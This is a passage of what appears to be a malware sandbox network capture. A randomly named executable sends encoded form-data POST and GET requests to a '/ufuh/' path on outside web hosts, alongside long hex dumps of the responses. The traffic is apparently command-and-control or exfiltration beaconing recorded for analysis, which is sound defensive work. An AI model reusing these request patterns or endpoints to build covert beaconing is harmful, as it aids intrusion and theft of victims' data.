Jun 3, 2024 08:53:26.778011084 CEST	212	IN	Data Raw: ff fe ae f2 bb c6 15 b4 9f b2 34 36 8d 88 04 d3 83 e4 ba 7d b9 fd b8 4b 8d 6b 26 6d 11 2e 93 81 0b 07 ba 98 b1 dd d2 4c d5 32 49 81 73 db 89 1d da fd 86 dd 10 9e b1 14 44 ca bf b1 05 c1 18 b3 15 9a ef 07 5a 56 ab 41 37 55 11 ff a5 a6 85 ff 18 fb Data Ascii: 46}Kk&m.L2IsDZVA7UC[-zRpWjc{V}fMeSj(70QD/_x"V2/U#+n`tB(E$C(+\|fiZcRu
Jun 3, 2024 08:53:26.778059959 CEST	1236	IN	Data Raw: 7a cf e6 49 bf 54 3e 50 44 93 01 07 62 ac 89 87 a1 c2 43 8e 01 d5 48 7b d6 67 58 7a e6 6c 5d 69 e2 59 a3 5b 6d ab 1b 4e 3a a6 c5 d8 7a cf a9 7a 3c b3 fa f7 f4 0f 6b 8e 9d d3 ab 55 60 2a 74 19 7f aa d4 6a 8f e5 ed 11 0e 11 57 3d 49 65 9d e4 8c b9 Data Ascii: zIT>PDbCH{gXzl]iY[mN:zz<kU`tjW=Ie20&G,'._WfK@fCyq[GQnd2C6`2Y-eA}ut~Z!]to*hOxqZoc[kYA1NFnOtI~IX<
Jun 3, 2024 08:53:26.778098106 CEST	1236	IN	Data Raw: 47 65 e2 92 be 30 66 1f 2c 52 91 4c 74 07 c3 39 ad b3 18 83 9a 20 f6 ac ea 3c ad ab 9e c7 aa a9 0d 55 29 c5 a2 32 3a ef e8 85 8c 4f 3e be df 6c 7b b1 f6 f1 cf b9 d4 c7 23 bd 49 10 f5 d7 4e b7 b6 89 e9 89 e8 95 c3 03 41 a5 b4 7f 89 73 48 a5 d9 3f Data Ascii: Ge0f,RLt9 <U)2:O>l{#INAsH?F<SwO&c7Fp7VTsM-\%9Cx4{u]fV2^#P>FTLE!\L(q7vUk>u&LYS^+(QfyH5BR^E(
Jun 3, 2024 08:53:26.778134108 CEST	1236	IN	Data Raw: 32 c0 77 86 68 c3 3c 6b 41 60 6e 52 cc cf 48 a7 1e 52 9c ed 91 d2 79 17 35 aa aa dd 06 b7 9c a7 f5 4e 95 20 7f 98 28 b5 fb 5d c1 89 90 11 11 59 02 09 53 34 a6 b5 a5 82 a3 3c 7f c9 4e 89 2f 8d fc cd 3c ed 2a f1 93 ca f5 fc c5 2a 4b 1f d5 7a 35 39 Data Ascii: 2wh<kA`nRHRy5N (]YS4<N/<**Kz59'")RBRLQA({j^Wia(/RNAQ6Om+aO(qfL.gkUxQfgG\sRM"a&FJ)Y<Tw4Vk+7%;<L};w
Jun 3, 2024 08:53:26.778171062 CEST	636	IN	Data Raw: 24 4a 48 94 7c 88 5a 8c 95 bc d9 15 fb 16 c4 01 19 66 e4 56 c3 af 14 49 4e 44 16 c1 9a f2 98 05 98 70 06 e2 85 19 63 6e 7b ea 46 5d 7b 7b 3a 7e fc 42 1a 11 48 a2 c2 37 eb 5d 4b 10 21 4f 67 cb 31 c8 5c 80 c2 39 98 60 88 d6 bf 39 cc 6a 51 15 19 48 Data Ascii: $JH\|ZfVINDpcn{F]{{:~BH7]K!Og1\9`9jQHI/"2HlZ0If%D<Fu%tLDD1 7NYOosr?B"\|peIL-xiI8kJX/_5N<58[<kFlMJJ
Jun 3, 2024 08:53:26.778206110 CEST	1236	IN	Data Raw: da 00 93 ab 40 4a 11 87 c8 e3 d8 a5 14 a6 c7 18 23 f0 98 07 cb 7f 7f 58 77 8d 1e df 8e 3b d3 a7 05 b4 d9 e0 d5 87 bb 94 0e a2 79 68 9c 2d 72 fe d8 0d 81 a8 5b a7 e9 7c c1 f8 6f 08 55 3d ac 1a c2 1b a2 34 7a db d9 f8 0d 71 3d a1 bc b3 d9 1b 92 21 Data Ascii: @J#Xw;yh-r[\|oU=4zq=!/0H//R}cvK2'*&)J1"n_KC:,)O%vk9.fN.LoC$N0&4E4>:}l&53=#B\2p.`@
Jun 3, 2024 08:53:26.778245926 CEST	1236	IN	Data Raw: c2 81 22 78 22 f5 4e 5e dd 39 e4 8f 7b 18 a2 f9 e6 ae 87 91 db c9 68 37 c6 3b 8a a9 4d 13 25 8d 78 7d 15 51 5a ba dc 08 c5 69 ff 72 73 81 ad 62 6e 14 22 b4 95 b9 51 89 dc 82 e6 46 31 bf 76 75 bd 10 8f d3 da e6 47 37 76 1b 9c 73 71 46 6b 99 f3 ad Data Ascii: "x"N^9{h7;M%x}QZirsbn"QF1vuG7vsqFk\@?W67{67E#o/%bvb$&INB1rCr&IN/Oq7rn\|IL\;D5DC~=Ln{C\|
Jun 3, 2024 08:53:26.778280020 CEST	424	IN	Data Raw: 0f c8 a8 cf 39 d2 a5 51 f7 a3 1b d1 c9 3f bb 5c 2c d8 64 17 58 11 c1 58 f3 2e d9 28 f0 32 04 31 8a 2a 00 12 53 c9 92 d2 8e 89 b8 54 5c 92 e8 01 d0 a4 e2 92 9f cc 00 0d d4 f8 4b 75 78 5c b2 5c 60 51 52 90 42 62 1a 80 47 ab 51 b3 b8 e4 ef c3 09 1b Data Ascii: 9Q?\,dXX.(21ST\Kux\\`QRBbGQL#jNa-dqUTalXp:c{.)Qs>y jHt3Ol6jR<2)i]?5r9=z*c]kJC\5
Jun 3, 2024 08:53:26.778320074 CEST	1236	IN	Data Raw: 1b dd 32 fa ef e1 89 5b bb 5e ff 6c f0 21 ae 1f 3c b9 b4 68 7c c1 c5 b4 ad 5c 63 68 09 3b a0 7c b0 0e 53 a6 e0 66 4d 7d 56 9a ad a7 b1 9a 03 6e ff 6e 44 96 27 b5 46 f4 57 ed 55 99 f3 f6 1a 71 6e 6d 24 cb b8 89 6b 83 df 92 32 eb e1 d6 b5 bc fe ce Data Ascii: 2[^l!<h\|\ch;\|SfM}VnnD'FWUqnm$k27;Ey1-].i"]_x8`=i3`O!E[2MeX(RQYzk].fpYV~grj*vX.jdft4Wkm
Jun 3, 2024 08:53:26.783366919 CEST	223	IN	Data Raw: 86 4f 13 b3 a6 85 ce bf 7e 78 b3 c4 db 9b 4c 25 cc a4 7c 1a d6 80 69 00 65 61 44 4b 5c e1 ce 02 17 e5 d2 02 b1 d0 e7 72 7d f0 2e 6c 50 96 68 7a 91 b5 83 87 af 6d 69 ae 12 b8 68 81 19 34 00 66 c3 91 03 c9 d1 b8 0a 45 8a 7c 5c 0e 2a ca 9f 27 d6 35 Data Ascii: O~xL%\|ieaDK\r}.lPhzmih4fE\|\'5%W>\|V_c:CSf]S[:m=B{&b/48N5Mk8eM`mgu@opl'X&J`9TcHR22VB/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49178	198.12.241.35	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:28.551907063 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.aceautocorp.com Origin: http://www.aceautocorp.com Referer: http://www.aceautocorp.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 69 4e 76 61 39 65 48 57 2f 70 74 72 5a 4e 46 76 61 35 50 41 4e 45 69 74 78 74 79 41 6f 32 37 36 78 74 65 72 68 75 44 4f 6e 6b 74 4c 51 76 58 67 63 61 5a 61 6c 4f 55 73 4f 35 4a 63 76 63 56 32 2b 35 35 57 37 72 2f 4a 79 77 75 51 46 6f 44 62 64 51 37 55 47 4b 46 73 57 55 68 4c 76 4d 43 73 79 57 67 68 65 76 69 6b 51 43 4a 33 51 31 5a 39 65 6d 49 43 70 63 38 71 43 44 4a 73 41 75 76 63 6f 63 46 47 4f 59 2b 78 32 66 47 4a 65 51 61 51 4e 4e 77 78 6a 4d 72 79 62 6c 68 6b 31 39 47 6c 4b 5a 36 45 62 2f 64 58 61 52 37 47 79 75 75 66 50 36 54 71 4b 6f 56 61 46 32 54 63 59 56 6d 43 39 75 6f 76 53 6e 47 6d 7a 57 4f 31 59 49 2f 44 52 52 50 70 6e 41 6c 49 64 52 65 66 36 79 62 51 6d 77 6d 38 50 63 61 6a 59 33 7a 59 2f 35 57 48 6f 71 48 37 65 71 75 4e 4c 39 47 54 65 2f 64 54 31 77 66 36 64 4c 6d 48 38 33 2f 45 57 35 7a 6c 50 4a 47 6a 62 35 46 68 56 79 58 4e 56 45 51 37 71 31 41 32 65 37 58 7a 4e 71 39 55 4a 45 37 59 56 77 72 42 77 30 68 75 39 75 32 2f 61 39 4d 65 44 [TRUNCATED] Data Ascii: ZXdp=mC8lfqMH3K9OiNva9eHW/ptrZNFva5PANEitxtyAo276xterhuDOnktLQvXgcaZalOUsO5JcvcV2+55W7r/JywuQFoDbdQ7UGKFsWUhLvMCsyWghevikQCJ3Q1Z9emICpc8qCDJsAuvcocFGOY+x2fGJeQaQNNwxjMryblhk19GlKZ6Eb/dXaR7GyuufP6TqKoVaF2TcYVmC9uovSnGmzWO1YI/DRRPpnAlIdRef6ybQmwm8PcajY3zY/5WHoqH7equNL9GTe/dT1wf6dLmH83/EW5zlPJGjb5FhVyXNVEQ7q1A2e7XzNq9UJE7YVwrBw0hu9u2/a9MeDg3BxwwnvxmQU2cRcb0ZoTOGvu8J+ZjdDZ87Ilc/yRlVblbceoFudcmJQKzLuClsA1FBpobw8PEMhuN7Bf9tpF0S1qkOdG75O+DYuoP3+X5ESJlF/OS0AVwXWRRhpj0nZZO1PQIZn1ZwF98WYw59GgQwLnScbcC27jd3jHHIDFKrO8/TZyykAbaNKIpcVfGxvA2BF/ah+vn1QFoug08M2JnfrpfUWIJWDcUqq4RxT6HPMJVCLrMQErtG3BZNsXW3Ugbm3G7W3ySdaNqHQEEmayKa34fJFgZSBl67cy31ZoQ6JGvlfl3Vu+82K9e0u/wvF7lAvlzGFqJx0uGP6mlEr7v/2SaKdMYN8o1wf1O7y0bC70jBtwdaKWKGEy6aJH6jDvsQuPWBPEVFPrXtQUxTpNAdu7gOmBIQQHfFmtR9HQlKoGJkaoRvq7np5DmuKuWT4DEgS18dCo5M7kFOp0g4YLqKpYvL0it/nrO6rA/LANXJT51zhN9tzR9fwSGbA4GZzOHfmkmhjA+avfY2R/KtpLfbi4ZxU81Mv5SrcU0vsmZZOxwSfBH3Gs4Ta001fkXHFjFzbrIXs/jBtNPKTvWzbc0HFwDKD9jh754yeH4tRP2H8dfrClNVvGuvHpBnx6Vk9A3mJnEgQVU6voRJdDVMEB4GDAbFPu+0gMf [TRUNCATED]
Jun 3, 2024 08:53:28.556874990 CEST	1684	OUT	Data Raw: 55 4d 6a 6e 4a 55 78 4e 63 45 76 6a 6f 36 51 46 58 42 43 43 2b 67 30 54 5a 76 72 35 68 6a 65 71 42 38 4a 7a 54 33 33 46 63 48 48 41 4a 45 76 32 6e 66 78 73 36 53 4b 2b 78 56 74 6a 55 36 50 65 6e 33 62 6f 78 6a 47 33 32 43 5a 2f 6a 44 52 51 6b 46 Data Ascii: UMjnJUxNcEvjo6QFXBCC+g0TZvr5hjeqB8JzT33FcHHAJEv2nfxs6SK+xVtjU6Pen3boxjG32CZ/jDRQkF/o9G/CwztzQW8XyHbqBPjkkBSOfSg5AA4M/3qOm3wzqhY06RWeJ8uNwH277GYIHyLxkHQcMgT9xjaJcQyh1pPoazLXTv5+y5vjkfEwdG8cyxLT0ZOdrNM/CZC6bEkCdzV5k6zZOSeqTADyWzSvJ1f6UbHrho4LYyP
Jun 3, 2024 08:53:29.289251089 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 03 Jun 2024 06:53:29 GMT Server: Apache X-Powered-By: PHP/8.1.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: br Content-Length: 9730 Content-Type: text/html; charset=UTF-8 Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 [TRUNCATED] Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g38rapddXl=jQQvpyX%'0XT2Z!"pW=E79tL>Jv5`Y+ilPpS:E[R6+\|J?/Gu= cL)v%w]>>1zH}7j5h7\lQM;NiK7p^ucBN6_m},5Ce{fQoPnz]y8v3<&{iy<oD87yW$7D;qe;z;lhBjr$c:ysDuuVQ=Ya1<)pP:D?^7pYtd(1]0m&1oyWhR7(+?KU{^C+"c<y'YQkpf1N\|fmpW>nlz4k_\+)weabmC_t'Ljk_1xbZ9!TxT=,OMV$9oO2Qk5wVlv"ju}OFE:I
Jun 3, 2024 08:53:29.289299011 CEST	212	IN	Data Raw: ff fe ae f2 bb c6 15 b4 9f b2 34 36 8d 88 04 d3 83 e4 ba 7d b9 fd b8 4b 8d 6b 26 6d 11 2e 93 81 0b 07 ba 98 b1 dd d2 4c d5 32 49 81 73 db 89 1d da fd 86 dd 10 9e b1 14 44 ca bf b1 05 c1 18 b3 15 9a ef 07 5a 56 ab 41 37 55 11 ff a5 a6 85 ff 18 fb Data Ascii: 46}Kk&m.L2IsDZVA7UC[-zRpWjc{V}fMeSj(70QD/_x"V2/U#+n`tB(E$C(+\|fiZcRu
Jun 3, 2024 08:53:29.289359093 CEST	1236	IN	Data Raw: 7a cf e6 49 bf 54 3e 50 44 93 01 07 62 ac 89 87 a1 c2 43 8e 01 d5 48 7b d6 67 58 7a e6 6c 5d 69 e2 59 a3 5b 6d ab 1b 4e 3a a6 c5 d8 7a cf a9 7a 3c b3 fa f7 f4 0f 6b 8e 9d d3 ab 55 60 2a 74 19 7f aa d4 6a 8f e5 ed 11 0e 11 57 3d 49 65 9d e4 8c b9 Data Ascii: zIT>PDbCH{gXzl]iY[mN:zz<kU`tjW=Ie20&G,'._WfK@fCyq[GQnd2C6`2Y-eA}ut~Z!]to*hOxqZoc[kYA1NFnOtI~IX<
Jun 3, 2024 08:53:29.289397001 CEST	1236	IN	Data Raw: 47 65 e2 92 be 30 66 1f 2c 52 91 4c 74 07 c3 39 ad b3 18 83 9a 20 f6 ac ea 3c ad ab 9e c7 aa a9 0d 55 29 c5 a2 32 3a ef e8 85 8c 4f 3e be df 6c 7b b1 f6 f1 cf b9 d4 c7 23 bd 49 10 f5 d7 4e b7 b6 89 e9 89 e8 95 c3 03 41 a5 b4 7f 89 73 48 a5 d9 3f Data Ascii: Ge0f,RLt9 <U)2:O>l{#INAsH?F<SwO&c7Fp7VTsM-\%9Cx4{u]fV2^#P>FTLE!\L(q7vUk>u&LYS^+(QfyH5BR^E(
Jun 3, 2024 08:53:29.289453983 CEST	1236	IN	Data Raw: 32 c0 77 86 68 c3 3c 6b 41 60 6e 52 cc cf 48 a7 1e 52 9c ed 91 d2 79 17 35 aa aa dd 06 b7 9c a7 f5 4e 95 20 7f 98 28 b5 fb 5d c1 89 90 11 11 59 02 09 53 34 a6 b5 a5 82 a3 3c 7f c9 4e 89 2f 8d fc cd 3c ed 2a f1 93 ca f5 fc c5 2a 4b 1f d5 7a 35 39 Data Ascii: 2wh<kA`nRHRy5N (]YS4<N/<**Kz59'")RBRLQA({j^Wia(/RNAQ6Om+aO(qfL.gkUxQfgG\sRM"a&FJ)Y<Tw4Vk+7%;<L};w
Jun 3, 2024 08:53:29.289486885 CEST	636	IN	Data Raw: 24 4a 48 94 7c 88 5a 8c 95 bc d9 15 fb 16 c4 01 19 66 e4 56 c3 af 14 49 4e 44 16 c1 9a f2 98 05 98 70 06 e2 85 19 63 6e 7b ea 46 5d 7b 7b 3a 7e fc 42 1a 11 48 a2 c2 37 eb 5d 4b 10 21 4f 67 cb 31 c8 5c 80 c2 39 98 60 88 d6 bf 39 cc 6a 51 15 19 48 Data Ascii: $JH\|ZfVINDpcn{F]{{:~BH7]K!Og1\9`9jQHI/"2HlZ0If%D<Fu%tLDD1 7NYOosr?B"\|peIL-xiI8kJX/_5N<58[<kFlMJJ
Jun 3, 2024 08:53:29.289525032 CEST	1236	IN	Data Raw: da 00 93 ab 40 4a 11 87 c8 e3 d8 a5 14 a6 c7 18 23 f0 98 07 cb 7f 7f 58 77 8d 1e df 8e 3b d3 a7 05 b4 d9 e0 d5 87 bb 94 0e a2 79 68 9c 2d 72 fe d8 0d 81 a8 5b a7 e9 7c c1 f8 6f 08 55 3d ac 1a c2 1b a2 34 7a db d9 f8 0d 71 3d a1 bc b3 d9 1b 92 21 Data Ascii: @J#Xw;yh-r[\|oU=4zq=!/0H//R}cvK2'*&)J1"n_KC:,)O%vk9.fN.LoC$N0&4E4>:}l&53=#B\2p.`@
Jun 3, 2024 08:53:29.289556026 CEST	212	IN	Data Raw: c2 81 22 78 22 f5 4e 5e dd 39 e4 8f 7b 18 a2 f9 e6 ae 87 91 db c9 68 37 c6 3b 8a a9 4d 13 25 8d 78 7d 15 51 5a ba dc 08 c5 69 ff 72 73 81 ad 62 6e 14 22 b4 95 b9 51 89 dc 82 e6 46 31 bf 76 75 bd 10 8f d3 da e6 47 37 76 1b 9c 73 71 46 6b 99 f3 ad Data Ascii: "x"N^9{h7;M%x}QZirsbn"QF1vuG7vsqFk\@?W67{67E#o/%bvb$&INB1rCr&IN/Oq7rn\|IL\
Jun 3, 2024 08:53:29.289591074 CEST	1236	IN	Data Raw: 11 1b 3b 44 9e c8 03 35 44 8e 88 8d 1c 43 7e c8 0b 3d 4c 6e c8 cd 7b cb 0b b1 b1 43 e5 84 7c 5e 21 f2 41 4e 3e 40 2e c8 c9 05 c8 03 39 b9 6e 63 8e 21 59 94 1b 66 4b 86 d8 61 4a 20 4e ba 3a 56 10 7e 30 cf 77 19 99 e7 97 ac 60 22 ce b4 45 33 3f cf Data Ascii: ;D5DC~=Ln{C\|^!AN>@.9nc!YfKaJ N:V~0w`"E3?1en"gF9@nne/-nTg{$[GFqf`}5Fc-GKs?JEC\8(oriaDNG}O;A2tidNg}O;+zbu.\?
Jun 3, 2024 08:53:29.289634943 CEST	1236	IN	Data Raw: b0 eb b1 b7 63 cd 5d f3 14 ad 6b 88 4a d6 11 83 43 9b c2 e5 81 ff 18 db 5c fb 05 35 e0 7f 18 3c 1f 33 99 cb 8c 1d 1b 78 5e b0 ac 04 82 96 8f 51 80 7e 35 a3 ef 8e dd ef ba 79 65 b8 59 7f 65 80 d9 4e a6 2f ad dd 0b 64 8c 7b 7a ed 6a 33 bc ba f3 9e Data Ascii: c]kJC\5<3x^Q~5yeYeN/d{zj3?;fN`YI!+JsOLFi5dq]tvn&WC+pq0\m[:['s7k5'qqQ:2[^l!<h\|\ch;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.22	49179	198.12.241.35	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:31.078911066 CEST	464	OUT	GET /ufuh/?ZXdp=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.aceautocorp.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:53:31.778630972 CEST	544	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 03 Jun 2024 06:53:31 GMT Server: Apache X-Powered-By: PHP/8.1.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://aceautocorp.com/ufuh/?ZXdp=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&7jsp7=zz9xHbtX Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.22	49180	183.111.183.31	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:37.391940117 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.mrart.co.kr Origin: http://www.mrart.co.kr Referer: http://www.mrart.co.kr/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 51 46 71 4d 4f 53 41 54 44 74 46 4d 53 50 59 71 72 77 50 30 43 30 56 7a 45 6d 38 6f 6d 4b 62 65 59 4e 4d 42 53 78 6d 67 79 32 70 68 58 46 31 6f 75 67 67 4b 39 46 54 65 4e 7a 79 72 31 54 4c 38 61 73 51 43 68 73 6e 61 69 52 61 65 68 38 52 56 36 53 6b 45 62 4c 6e 62 35 51 75 2b 4a 74 52 30 45 69 35 57 6e 67 44 79 52 76 59 30 32 4d 52 75 6f 4e 67 63 42 31 73 69 59 76 30 39 37 32 6a 47 76 31 37 63 70 6c 61 65 73 34 53 54 6c 42 65 66 59 32 6c 5a 41 6e 41 45 4b 58 4a 37 38 77 4c 48 46 76 32 70 78 47 78 53 38 54 2f 70 56 42 4b 2b 76 39 78 38 76 4f 6e 49 42 35 6a 4c 42 6e 54 6d 72 74 47 37 6a 69 79 34 38 71 50 6a 56 4a 44 76 6b 46 38 37 6e 35 6e 62 55 56 50 42 59 72 49 42 36 79 59 38 51 68 4d 6d 65 6e 6e 70 61 61 71 59 58 2f 43 77 53 41 63 6a 30 54 32 4f 6b 34 32 5a 74 6c 54 4b 7a 34 49 6c 38 62 75 31 6e 62 72 45 44 4d 58 4c 52 78 39 63 51 33 59 6a 56 4f 55 6f 2f 39 7a 41 6c 73 49 78 56 70 49 63 46 58 56 62 74 66 34 75 52 38 4a 6f 54 74 69 61 2f 38 63 6e 56 4e 45 76 6a 58 76 2b 71 35 68 4c 59 [TRUNCATED] Data Ascii: ZXdp=QFqMOSATDtFMSPYqrwP0C0VzEm8omKbeYNMBSxmgy2phXF1ouggK9FTeNzyr1TL8asQChsnaiRaeh8RV6SkEbLnb5Qu+JtR0Ei5WngDyRvY02MRuoNgcB1siYv0972jGv17cplaes4STlBefY2lZAnAEKXJ78wLHFv2pxGxS8T/pVBK+v9x8vOnIB5jLBnTmrtG7jiy48qPjVJDvkF87n5nbUVPBYrIB6yY8QhMmennpaaqYX/CwSAcj0T2Ok42ZtlTKz4Il8bu1nbrEDMXLRx9cQ3YjVOUo/9zAlsIxVpIcFXVbtf4uR8JoTtia/8cnVNEvjXv+q5hLYxzaMQ2vCA/BsC8WH86gLF8/UyQbGZd+ou5IUjTlGuHOXW2SgrcdaxhzKmMMZIpdV95qcHLNYmZ1h+l0LNrZZZxZGnuXw3CXs6+qd7Gu6XCEpI7Lo0jk5k1rzHKFD8gE/ifnXH7OBgb+2VgNsnPdS4DUx0CcxQ4MgWdEq13VnR7YAzrNEfedlV0Erh2wmfO0zspCRsyagYKKbhhi9M+vKCAXDPM79I/o7LokSH22m+jiLD3gHT3JqgPu36QwzM2a0Sq9OMWW+oaumVCLZweMZlyQeoykgfWwJ1XnH/TFomLZ3kaSrfi2zmX7DxvGELkUTgpCO7Ixr8p2paN297cR69QUn8Z5dtyrATltOM6dgLPRKvJ8NMKXnHxR4jsBveJi1ppDpi1XCJ2RdNgXrOoq9vxSEekLSSfynoQaS09XtgaKX76xfW5nbalBTDHWs1EjCYxT09uOu2kInhuycUSnG64SRYDS5vlier2JtFC4H657xtCSKaVq88K9t8TsdJBB8HsoxFMm6Qf8cruX4jiMme2MMSeEx/otLPz07Xtmy8JNAruIlK8wEYQR2jcMViaOLYoo9B9GA/tH8AfHMA3oOKyqQ/36hGoS7YtY3CJWVvIGhyN7jFWyphbzFV0OW7g89wzpkHtBhrA2mec8kB2NO7pv/YSieAkt+Kn [TRUNCATED]
Jun 3, 2024 08:53:37.397229910 CEST	208	OUT	Data Raw: 35 47 4e 41 39 78 54 4f 61 7a 63 38 57 39 5a 41 31 74 62 63 4a 2b 36 39 31 46 33 2b 5a 4c 54 75 58 6d 36 36 54 59 69 66 53 68 49 6e 42 63 51 64 76 42 50 6b 76 39 68 71 49 62 58 52 67 59 34 58 7a 43 56 76 71 37 39 6d 49 6d 54 55 56 33 78 79 72 6f Data Ascii: 5GNA9xTOazc8W9ZA1tbcJ+691F3+ZLTuXm66TYifShInBcQdvBPkv9hqIbXRgY4XzCVvq79mImTUV3xyrokTOCiOH7VybzwAERJqaxMPMpdriJ4hQYpn5frLF8CkBRFSxpx+TZKWZD7V8XPXdd5x9P4Cw0syfUyyawY799Odpxhv50NTdHNkEo5E4ywKAbjAILb5a9azWcnxKvm0
Jun 3, 2024 08:53:38.587833881 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 03 Jun 2024 06:53:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding,Cookie Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 31 39 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3d 6b 8f dc 46 72 9f 2d e0 fe 43 2f 05 69 67 4e 24 87 e4 3c 76 76 76 67 75 3a 59 be 73 e2 3b 19 5a 19 87 83 24 2c 7a c8 9e 19 4a 1c 92 26 39 fb b8 f5 02 ce 9d 12 5c 62 03 f9 60 1b 30 12 1b 30 72 97 7c f2 87 c4 b9 03 1c 20 f9 43 d2 fa 3f a4 aa 9b 8f 1e 0e e7 b1 0f 1d 10 20 6b ed ec b0 bb ba aa ba ba aa ba aa 9b dd de dd 78 fb e1 fd c7 bf 7e ff 01 19 27 13 6f ef 47 37 76 f1 2f f1 a8 3f ea 2b 2f 02 ed af 1f 29 bc 90 51 07 fe be b5 3b 61 09 25 f6 98 46 31 4b fa ca 07 8f df d1 ba 4a 51 e1 d3 09 eb 2b 87 2e 3b 0a 83 28 51 88 1d f8 09 f3 01 f0 c8 75 92 71 df 61 87 ae cd 34 fe a0 12 d7 77 13 97 7a 5a 6c 53 8f f5 4d 81 c6 73 fd 17 24 62 5e 5f 09 a3 60 e8 7a 4c 21 e3 88 0d fb ca 38 49 c2 5e a3 31 9a 84 23 3d 88 46 8d e3 a1 df 30 cd 32 ed cd 28 18 04 49 bc 99 53 de f4 03 d7 77 d8 b1 4a 86 81 e7 05 47 9b a4 b1 77 03 9a 6c 68 1a 79 3c 76 63 12 bb 09 23 f0 37 08 13 77 e2 fe 86 39 e4 c8 4d c6 24 19 33 f2 eb 80 c6 09 d9 7f f0 90 84 de 74 e4 fa e4 d0 b2 74 93 68 